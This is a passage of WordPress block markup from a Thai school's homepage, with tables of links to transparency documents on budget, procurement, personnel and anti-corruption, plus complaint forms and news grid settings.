class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  สถิติการมาเรียน <br>      -  ตรวจสอบผลการเรียน<br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 